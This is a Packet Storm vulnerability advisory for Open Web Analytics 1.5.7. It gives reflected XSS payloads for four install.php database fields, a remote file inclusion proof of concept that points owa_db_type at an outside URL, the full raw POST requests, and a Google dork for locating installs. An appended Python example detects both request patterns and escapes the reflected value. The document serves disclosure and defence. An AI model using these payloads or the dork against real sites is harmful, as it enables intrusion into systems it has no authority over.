Open Web Analytics 1.5.7 Cross Site Scripting / Remote File Inclusion

2014-07-16T00:00:00
ID PACKETSTORM:127488
Type packetstorm
Reporter Govind Singh
Modified 2014-07-16T00:00:00

Description

                                        
`##################################################################################################  
#  
#Exploit Title : Open Web Analytics - v: 1.5.7 Multiple Vulnerabilities  
#Author : Govind Singh aka NullPort  
#Vendor : http://www.openwebanalytics.com/  
#Download Link : http://downloads.openwebanalytics.com/  
#Google Dork : "powered by Open Web Analytics"   
#Date : 14/07/2014  
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )  
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi  
#Greetz to : All IHT Members  
#   
###################################################################################################  
  
About vendor :  
-+-+-+-+-+-+-+-+-+-+-+-+-+  
Open Web Analytics (OWA) is open source web analytics software that you can use to track and analyze how people use your websites and applications.   
OWA also comes with built-in support for tracking websites made with popular content management frameworks such as WordPress and MediaWiki.  
  
1.) Reflected XSS  
  
Reflected Cross-Site Scripting in "install.php" via the parameters "owa_db_host", "owa_db_name", "owa_db_password" and "owa_db_user".  
  
PoC :   
  
owa_db_host=   
payload :: 127" onmouseover=prompt(901496) bad="  
+++++++++++++++++++++++++++++++++++++++++++++++  
owa_db_name=   
payload :: indiancrew" onmouseover=prompt(979236) bad="  
+++++++++++++++++++++++++++++++++++++++++++++++  
owa_db_password   
payload : 1ND14NH4X0R5T34M" onmouseover=prompt(911667) bad="  
+++++++++++++++++++++++++++++++++++++++++++++++  
owa_db_user  
payload : 1" onmouseover=prompt(925045) bad="  
+++++++++++++++++++++++++++++++++++++++++++++++  
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/owa/install.php?owa_action=base.installCheckEnv  
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=256  
POSTDATA=owa_public_url=http%3A%2F%2Flocalhost%2Fowa%2F&owa_db_type=mysql&owa_db_host=127" onmouseover=prompt(901496) bad="&owa_db_name=null&owa_db_user=nullport&owa_db_password=IndianCrew&owa_nonce=f6466bb4c4&owa_action=base.installConfig&owa_save_button=Continue...  
---------------------------------------------------------------------------------------------------------  
  
2.) Remote File Inclusion  
  
PoC :  
File inclusion in "install.php" when the URL-encoded POST input "owa_db_type" is set to https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-xpa1/t1.0-9/1098413_154775491385294_984206350_n.jpg  
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/owa/install.php?owa_action=base.installCheckEnv  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=321  
POSTDATA=owa_public_url=http%3A%2F%2Flocalhost%2Fowa%2F&owa_db_type=https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-xpa1/t1.0-9/1098413_154775491385294_984206350_n.jpg&owa_db_host=localhost&owa_db_name=owa&owa_db_user=Null&owa_db_password=IndianCrew&owa_nonce=64a1c7957f&owa_action=base.installConfig&owa_save_button=Continue...  
  
PoC image :: http://i59.tinypic.com/2q00hgi.jpg  
`
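
Added example, not part of the original advisory and not OWA's own code: a server-side check that flags both request patterns shown above (a non-allowlisted "owa_db_type" and attribute-breakout characters in the "owa_db_*" text fields), plus the attribute encoding that neutralises the reflected value. The function names, the allowlist containing only "mysql" and the sample bodies are assumptions constructed from the requests in the advisory.

```python
import html
import re
from urllib.parse import parse_qs

# Assumption: "mysql" is the only owa_db_type value shown in the advisory.
ALLOWED_DB_TYPES = {"mysql"}
TEXT_FIELDS = ("owa_db_host", "owa_db_name", "owa_db_user", "owa_db_password")
# Characters that can close an HTML attribute value or open a tag.
ATTR_BREAKOUT = re.compile(r"[\"'<>]")

def check_install_post(body):
    """Return findings for one form-encoded install.php POST body."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    db_type = fields.get("owa_db_type", "")
    if db_type not in ALLOWED_DB_TYPES:
        # A URL or path in this field is the pattern from section 2.
        findings.append("owa_db_type: not in allowlist: %r" % db_type)
    for name in TEXT_FIELDS:
        if ATTR_BREAKOUT.search(fields.get(name, "")):
            # A quote that ends the attribute is the pattern from section 1.
            findings.append("%s: attribute breakout character" % name)
    return findings

def attr_escape(value):
    """Encode a value before echoing it inside a quoted HTML attribute."""
    return html.escape(value, quote=True)

# Constructed sample bodies, shortened from the two requests in the advisory.
XSS_BODY = ('owa_db_type=mysql&owa_db_host=127" onmouseover=prompt(901496) bad="'
            '&owa_db_name=null&owa_db_user=nullport&owa_db_password=IndianCrew')
RFI_BODY = ('owa_db_type=https://example.invalid/image.jpg&owa_db_host=localhost'
            '&owa_db_name=owa&owa_db_user=Null&owa_db_password=IndianCrew')
CLEAN_BODY = ('owa_db_type=mysql&owa_db_host=localhost'
              '&owa_db_name=owa&owa_db_user=owa&owa_db_password=s3cret')

if __name__ == "__main__":
    for label, body in (("xss", XSS_BODY), ("rfi", RFI_BODY), ("clean", CLEAN_BODY)):
        print(label, check_install_post(body))
    print(attr_escape('127" onmouseover=prompt(901496) bad="'))
```

A legitimate database password may contain a quote character, so for that field the encoding in attr_escape is the fix and the breakout finding is only a signal for review.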